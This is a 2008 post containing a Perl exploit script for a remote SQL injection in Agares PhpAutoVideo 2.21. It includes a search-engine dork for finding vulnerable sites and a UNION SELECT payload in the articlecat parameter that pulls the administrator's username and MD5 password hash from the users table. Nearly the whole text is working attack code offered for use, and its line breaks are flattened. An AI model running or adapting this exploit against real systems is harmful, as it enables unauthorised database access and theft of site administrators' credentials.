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Posted on 14 January 2008

#!/usr/bin/perl #Agares PhpAutoVideo 2.21 (articlecat) Remote SQL Injection Exploit #Bug Found by ka0x ( http://milw0rm.org/exploits/4901 ).. but sql injection works if we include in index.php bug file with sql injection..like this : #[SQL] #So.. we can execute sql query and we have user admin & pass in MD5 #Exploit by Pr0metheus #Gr33tz to Gr33tz-Team.org #Dork : "powered by AMCMS3" ############################################### use LWP::UserAgent; if(@ARGV!=3){ print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= "; print "Agares PhpAutoVideo 2.21 Remote Sql Injection "; print "perl $0 <site> <path> <prefix> "; print "default prefix - amcms "; print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= "; } ($site,$path,$prefix)=@ARGV; $file = "index.php?loadpage=./includes/articleblock.php&articlecat="; $query = "1+and+1=2+UNION+SELECT+userkey,username,password,4,5,6,7,8,9,10+from+".$prefix."_users+where+userkey=1/*"; $ua = new LWP::UserAgent; $ua->agent("Mozilla/8.0"); $ua = LWP::UserAgent->new; my $req = HTTP::Request->new(GET => "".$site."".$path."".$file."".$query.""); $req->header('Accept' => 'text/html'); $res = $ua->request($req); $con = $res->content; if($con =~ /<p>(.*)</p>/){ $p = $1; print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= "; print "Agares PhpAutoVideo 2.21 Remote Sql Injection "; print "[+] Admin Pass : ".$p." "; if($con =~/">(.*)</a></h1>/){ $u = $1; print "[+] Admin Username : ".$u." "; print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= "; } else{ print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= "; print "Agares PhpAutoVideo 2.21 Remote Sql Injection "; print "[+] Exploit Failed... "; print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= "; } } else{ print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= "; print "Agares PhpAutoVideo 2.21 Remote Sql Injection "; print "[+] Exploit Failed... "; print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= "; }